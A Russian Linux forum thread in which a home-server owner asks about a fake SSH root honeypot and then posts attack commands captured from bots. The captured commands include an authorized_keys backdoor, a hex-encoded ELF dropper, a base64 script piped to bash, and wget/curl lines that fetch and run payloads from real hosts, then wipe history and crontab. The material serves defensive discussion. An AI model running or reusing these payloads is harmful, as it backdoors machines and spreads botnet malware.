LINUX.ORG.RU
ФорумSecurity

Фейковый root пользователь для ssh

 , , ,


2

1

Можно ли сделать фейковый рут пользователя с паролем 1234 для sshd, но чтобы он ничего не мог делать? И подключившимуся кулхацкеру послание оставить? А то кто-то мне на сервак стучится, хочу с ним поздороваться, поболтать по душам :) Никогда не думал, что на мой homeserver кто-то будет стучатся, пробивать SIP, даже пытаются ломануть ssh ключ (!) с помощью старого diffie-hellman-sha1 подбором!!!! Первый раз такое вижу. Хочу с хацкером поболтать по почте или XMPP :))).

Браузер Atom через Firejail + Wine для сбера?
Заблокировать исходящие соединение с IP через firewall-cmd

Это роботы, все полностью автоматизировано, времена когда живой хакер ползал по чужой системе давно прошли.

Но honeypot можешь сделать, посмотришь чего тебе туда зальют, скорее всего в /tmp закинут какую-нибудь дрянь, типа шифровальщика или бэкдора.

soomrack ★★★★★
()

Вот такими запросами мой лог забивают :)

bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:45 +0300] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:46 +0300] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:46 +0300] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:46 +0300] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
bh4.ru 206.189.32.216 - - [14/Jan/2023:00:53:47 +0300] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 0
realbarmaley ★★
() автор топика

Обычно это зараженные устройства дальше стараются расширять ботнет, а не китайский хацкер лично изводится над чьим-то компом.

Если бот сможет войти и рутануться, то скорее всего закинет бинарник в системные либы, а также настройки (часто универсальные и допотопные) в cron-ы и /etc/init.d

NDfan
()
Ответ на: комментарий от realbarmaley

Да никак, настраивай как хочешь. Тут главная проблема это уязвимости твоей системы, ведь были баги которые позволяли выйти и из песочный, и из chroot, и из qemu…

ИМХО, лучше отдельный комп для этого иметь.

soomrack ★★★★★
()

Тут в Иране уже несколько дней подсеть прорвало. При чем все компы оттуда на centos. Про ssh это само собой. Для начала поменяй дефолтный порт. 

Chain f2b-exim (1 references)
 pkts bytes target     prot opt in     out     source               destination         
   46  2432 DROP       all  --  *      *       124.156.223.97       0.0.0.0/0           
  140  8300 DROP       all  --  *      *       46.148.40.143        0.0.0.0/0           
  272 16220 DROP       all  --  *      *       46.148.40.148        0.0.0.0/0           
  142  8428 DROP       all  --  *      *       46.148.40.146        0.0.0.0/0           
  120  7080 DROP       all  --  *      *       46.148.40.191        0.0.0.0/0           
  121  7168 DROP       all  --  *      *       46.148.40.197        0.0.0.0/0           
  139  8248 DROP       all  --  *      *       46.148.40.140        0.0.0.0/0           
  144  8520 DROP       all  --  *      *       46.148.40.144        0.0.0.0/0           
  146  8660 DROP       all  --  *      *       46.148.40.147        0.0.0.0/0           
  145  8608 DROP       all  --  *      *       46.148.40.149        0.0.0.0/0           
  119  7040 DROP       all  --  *      *       46.148.40.186        0.0.0.0/0           
  121  7168 DROP       all  --  *      *       46.148.40.136        0.0.0.0/0           
  121  7168 DROP       all  --  *      *       46.148.40.190        0.0.0.0/0           
  146  8660 DROP       all  --  *      *       46.148.40.145        0.0.0.0/0           
  124  7348 DROP       all  --  *      *       46.148.40.135        0.0.0.0/0           
  125  7400 DROP       all  --  *      *       46.148.40.192        0.0.0.0/0           
  148  8788 DROP       all  --  *      *       46.148.40.142        0.0.0.0/0           
  124  7348 DROP       all  --  *      *       46.148.40.193        0.0.0.0/0           
  122  7220 DROP       all  --  *      *       46.148.40.198        0.0.0.0/0           
  121  7168 DROP       all  --  *      *       46.148.40.183        0.0.0.0/0           
  124  7348 DROP       all  --  *      *       46.148.40.185        0.0.0.0/0           
  143  8488 DROP       all  --  *      *       46.148.40.141        0.0.0.0/0           
  129  7620 DROP       all  --  *      *       46.148.40.130        0.0.0.0/0           
  128  7560 DROP       all  --  *      *       46.148.40.114        0.0.0.0/0           
  129  7620 DROP       all  --  *      *       46.148.40.107        0.0.0.0/0           
  250 14908 DROP       all  --  *      *       46.148.40.94         0.0.0.0/0           
  250 14908 DROP       all  --  *      *       46.148.40.189        0.0.0.0/0           
  130  7708 DROP       all  --  *      *       46.148.40.49         0.0.0.0/0           
  154  9148 DROP       all  --  *      *       46.148.40.199        0.0.0.0/0           
  133  7900 DROP       all  --  *      *       46.148.40.13         0.0.0.0/0           
  133  7888 DROP       all  --  *      *       46.148.40.196        0.0.0.0/0           
  260 15500 DROP       all  --  *      *       46.148.40.77         0.0.0.0/0           
  214 12748 DROP       all  --  *      *       46.148.40.153        0.0.0.0/0           
  268 15988 DROP       all  --  *      *       46.148.40.195        0.0.0.0/0           
  222 13200 DROP       all  --  *      *       46.148.40.151        0.0.0.0/0           
  225 13380 DROP       all  --  *      *       46.148.40.152        0.0.0.0/0           
 7352  441K DROP       all  --  *      *       46.148.40.150        0.0.0.0/0           
18222 1093K DROP       all  --  *      *       80.94.95.204         0.0.0.0/0           
18957 1137K DROP       all  --  *      *       46.148.40.90         0.0.0.0/0           
16786 1007K DROP       all  --  *      *       46.148.40.168        0.0.0.0/0

hbars ★★★★★
()

Если бы имелась хоть какая-то вероятность, что это живой человек, готовый вступить в диалог, можно было бы в самом деле просто дать ему рута с паролем 1234, предварительно настроив sshd вываливать в stdout сообщение со списком контактов и завершать сессию.

thesis ★★★★★
()

Не особо задавался вопросом взлома по SSH (всё равно всё на ключах и без депрекейтъд алго), но пришёл к тому, что наружу торчит только wireguard - а он вообще не отвечает на неудачные попытки автентификации (т.е. с неизвестным ключом).

Насчет «связаться» - сканируют всё равно боты, которые не факт, что вообще что-либо логгируют после неуспешного присоединения ломаемого хоста к ботнету (или что там другое ялвяется целью взломщика). Тем более, что многие из них - на зараженых машинах жертв, а тогда отсылать через C&C подробные отчеты о деятельности данного бота тем более затратно и палевно.

Если кто-то знает больше меня про современную ботнетоводческую практику и люто фейспалмит от этих откровений - не стесняйтесь поправить.

Из того, что можно причинить подобным автоматам: есть honeypotы, виртуальные машины, которые намеренно позволяется ему взломать, после чего раскрывается цель и modus operandi бота - что откуда скачивает, куда пытается связаться, в общем всякие полезные сведения с точки зрения выявления и поимки того, кто им управляет. Есть tarpitы, в которых бот застревает, например, в бесконечной попытке авторизироваться - таким образом он не переходит к сканировании других хостов, а киберпреступник теряет время и ресурсы.

token_polyak ★★★★★
()
Последнее исправление: token_polyak (всего исправлений: 4)
Ответ на: комментарий от SpaceRanger

Ага, если для iptables, без сохранения, то наподобие этого:

iptables -t nat -A PREROUTING -d HOST_IP -p tcp -m tcp --dport 22 -j DNAT --to-destination GUEST_IP:22

Конечно, у хоста sshd должен быть на другой порту. И доступен самому админу ))

NDfan
()
Ответ на: комментарий от realbarmaley

А что там рассказывать. Активно брутфорсят smtp.
подсеть: 46.148.40.0 

Регион: Isfahan Isfahan 10 
Город: Shahin Shahr Shahin Shahr 
Координаты: 32.8797 51.5466 
Провайдер ISP: Blue Diamond Network Co., Ltd. PartPayam Shahin Shahr ISP AS15828 Blue Diamond Network Co., Ltd. WCD-AS

hbars ★★★★★
()
Ответ на: комментарий от realbarmaley

Вот еще что вводят:

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
realbarmaley ★★
() автор топика
Ответ на: комментарий от realbarmaley

Опа, уже бекдор ставят:


22:31:38 	$ cp /bin/echo /home/.z && >/home/.z && cd /home/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /tmp/.z && >/tmp/.z && cd /tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /var/tmp/.z && >/var/tmp/.z && cd /var/tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /home/$USER/.z && >/home/$USER/.z && cd /home/$USER/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /dev/.z && >/dev/.z && cd /dev/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /var/.z && >/var/.z && cd /var/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /etc/.z && >/etc/.z && cd /etc/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ cp /bin/echo /dev/shm/.z && >/dev/shm/.z && cd /dev/shm/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; 	
22:31:38 	$ wget || busybox wget || wd1; curl || busybox curl || cd1; echo -e '\x67\x61\x79\x66\x67\x74'; 	
22:31:38 	$ echo -en '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x14\x84\x04\x08\x34\x00\x00\x00\x88\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x6d\x04\x00\x00\x6d\x04\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x70\x04\x00\x00\x70\x94\x04\x08\x70\x94\x04\x08\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x55\x89\xe5\x8b\x4d\x0c\x53\x8b\x55\x10\x8b\x5d\x08\xeb\x06\x8a\x41\xff\x88\x43\xff\x4a\x43\x41\x83\xfa\xff\x75\xf2\x5b\x5d\xc3\x55\x89\xe5\x8b\x55\x0c\x53\x31\xdb\xeb\x02\x89\xc3\x80\x3c\x13\x00\x8d\x43\x01\x75\xf5\x50\x52\xff\x75\x08\xe8\xc0\xff\xff\xff\x89\xd8\x8b\x5d\xfc\xc9\xc3\x55\x89\xe5\x0f\xb6\x55\x08\x0f\xb6\x45\x0c\x0f\xb6\x4d\x10\xc1\xe2\x18\xc1\xe0\x10\x09\xc2\x0f\xb6\x45\x14\xc1\xe1\x08\x5d\x09\xc2\x09\xd1\x89\xca' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x89\xc8\x81\xe2\x00\xff\x00\x00\xc1\xe2\x08\xc1\xe0\x18\x09\xd0\x89\xca\x81\xe1\x00\x00\xff\x00\xc1\xea\x18\xc1\xe9\x08\x09\xca\x09\xd0\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x01\xe8\xed\x02\x00\x00\x83\xc4\x10\xc9\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x06\xe8\xd8\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc0\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x6a\x66\xe8\x99\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x04\xe8\x81\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x03\xe8\x69\x02\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x42\x02\x00\x00\xc9\xc3\x55\x89\xe5\x57\x56\x53\x81\xec\xec\x00\x00\x00\x68\xcf\x00\x00\x00\x68\xf3\x00\x00\x00\x68\xce\x00\x00\x00\x6a\x6d\x66\xc7\x45' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\xc0\x02\x00\x66\xc7\x45\xc2\x00\x50\xe8\xcd\xfe\xff\xff\x83\xc4\x0c\x68\xff\x01\x00\x00\x68\x41\x02\x00\x00\xc6\x45\xf1\x69\xc6\x45\xf0\x2e\x89\x45\xc4\x8d\x45\xf0\x50\xc6\x45\xf2\x00\xe8\x17\xff\xff\xff\x83\xc4\x0c\x6a\x00\x6a\x01\x6a\x02\x89\x85\x10\xff\xff\xff\xe8\x72\xff\xff\xff\x83\xc4\x10\x89\x85\x0c\xff\xff\xff\x40\x74\x09\x83\xbd\x10\xff\xff\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xbd\xfe\xff\xff\x83\xc4\x10\x57\x6a\x10\x8d\x45\xc0\x50\xff\xb5\x0c\xff\xff\xff\xe8\xe7\xfe\xff\xff\x83\xc4\x10\x85\xc0' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\x96\xfe\xff\xff\x83\xc4\x10\xc6\x45\xdc\x2f\xb8\x01\x00\x00\x00\xc6\x45\xd3\x20\xc6\x45\xd9\x6e\xc6\x45\xd0\x47\xc6\x45\xd7\x68\xc6\x45\xd2\x54\xc6\x45\xdb\x77\xc6\x45\xd5\x73\xc6\x45\xd1\x45\xc6\x45\xda\x65\xc6\x45\xd4\x2f\xc6\x45\xd6\x73\xc6\x45\xd8\x2f\xc6\x45\xdd\x00\xc6\x45\xe5\x2e\xc6\x45\xde\x20\xc6\x45\xe1\x54\xc6\x45\xe8\x0a\xc6\x45\xe0\x54\xc6\x45\xe4\x31\xc6\x45\xe3\x2f\xc6\x45\xe9\x0d\xc6\x45\xe6\x30\xc6\x45\xea\x0a\xc6\x45\xe7\x0d\xc6\x45\xe2\x50\xc6\x45\xdf' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x48\xc6\x44\x05\x9f\x00\x40\x83\xf8\x21\x75\xf5\x31\xff\xc6\x45\xee\x36\xc6\x45\xec\x78\xc6\x45\xed\x38\xc6\x45\xef\x00\xeb\x01\x47\x80\x7c\x2f\xec\x00\x75\xf8\x8d\x45\xd0\x50\x8d\x5d\xa0\x53\xc6\x45\xeb\x00\xe8\x7b\xfd\xff\xff\x8d\x34\x03\x8d\x45\xec\x50\x56\xe8\x6e\xfd\xff\xff\x8d\x55\xde\x52\x8d\x04\x06\x50\x8d\x77\x1a\xe8\x5e\xfd\xff\xff\x89\x34\x24\x53\xff\xb5\x0c\xff\xff\xff\xe8\x24\xfe\xff\xff\x83\xc4\x20\x39\xf0\x74\x0d\x83\xec\x0c\x6a\x03\xe8\xad\xfd\xff\xff\x83\xc4\x10\x31\xdb\x56\x6a\x01\x8d\x45' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\xf3\x50\xff\xb5\x0c\xff\xff\xff\xe8\x14\xfe\xff\xff\x83\xc4\x10\x48\x74\x0d\x83\xec\x0c\x6a\x04\xe8\x86\xfd\xff\xff\x83\xc4\x10\x0f\xbe\x45\xf3\xc1\xe3\x08\x09\xc3\x81\xfb\x0a\x0d\x0a\x0d\x75\xca\x51\x68\x80\x00\x00\x00\x8d\x9d\x20\xff\xff\xff\x53\xff\xb5\x0c\xff\xff\xff\xe8\xd8\xfd\xff\xff\x83\xc4\x10\x85\xc0\x7e\x13\x52\x50\x53\xff\xb5\x10\xff\xff\xff\xe8\xab\xfd\xff\xff\x83\xc4\x10\xeb\xce\x83\xec\x0c\xff\xb5\x0c\xff\xff\xff\xe8\x47\xfd\xff\xff\x58\xff\xb5\x10\xff\xff\xff\xe8\x3b\xfd\xff\xff\xc7\x04\x24' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:39 	$ echo -en '\x05\x00\x00\x00\xe8\x1a\xfd\xff\xff\x83\xc4\x10\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x55\x89\xe5\x5d\xe9\xc3\xfd\xff\xff\x90\x90\x90\x55\x57\x56\x53\x8b\x6c\x24\x2c\x8b\x7c\x24\x28\x8b\x74\x24\x24\x8b\x54\x24\x20\x8b\x4c\x24\x1c\x8b\x5c\x24\x18\x8b\x44\x24\x14\xcd\x80\x5b\x5e\x5f\x5d\x3d\x01\xf0\xff\xff\x0f\x83\x01\x00\x00\x00\xc3\x83\xec\x0c\x89\xc2\xf7\xda\xe8\x09\x00\x00\x00\x89\x10\x83\xc8\xff\x83\xc4\x0c\xc3\xb8\x70\x94\x04\x08\xc3\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:40 	$ echo -en '\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x94\x80\x04\x08\x94\x00\x00\x00\xd9\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x70\x94\x04\x08\x70\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:40 	$ echo -en '\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x04\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> .d; echo -e '\x65\x63\x68\x6F\x64\x6F\x6E\x65'; 	
22:31:40 	$ ./.d; ./.i scan.ssh.x86_64; >.i; >.d;
realbarmaley ★★
() автор топика
Ответ на: комментарий от realbarmaley

Все по классике:

sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4Cm1rZGlyIC5YMTktdW5peApjZCAuWDE5LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgxOS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgxOS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMTktdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==" | base64 --decode | bash
realbarmaley ★★
() автор топика
Ответ на: комментарий от realbarmaley

Тут имеет смысл посмотреть, откуда они качают dota3.tar.gz и если это не bulletproof hosting, написать им на abuse@. Остальное интересно изучать первых три раза. 😒

ivlad ★★★★★
()
Ответ на: комментарий от realbarmaley

А вот, что китайцы присылают:

cd /var/tmp || cd /data/local/tmp/ || cd /tmp/ || cd /var/ || curl -s -L -O 107.182.129.219/x.sh ; wget -q 107.182.129.219/x.sh ; busybox wget http://107.182.129.219/x.sh ; sh x.sh ; rm -rf .* ; rm -rf * ; history -c ; rm -rf ~/.bash_history ; crontab -r ; cd /var/tmp || cd /dev/shm ; mkdir /var/tmp/.update-logs ; cd /var/tmp/.update-logs ; rm -rf .* ; rm -rf * ; wget -q arhivehaceru.com/.x/Update || curl -O -s -L arhivehaceru.com/.x/Update ; wget -q arhivehaceru.com/.x/History || curl -O -s -L arhivehaceru.com/.x/History ; chmod +x * ; ./History ; history -c
realbarmaley ★★
() автор топика
Браузер Atom через Firejail + Wine для сбера?
Security
Заблокировать исходящие соединение с IP через firewall-cmd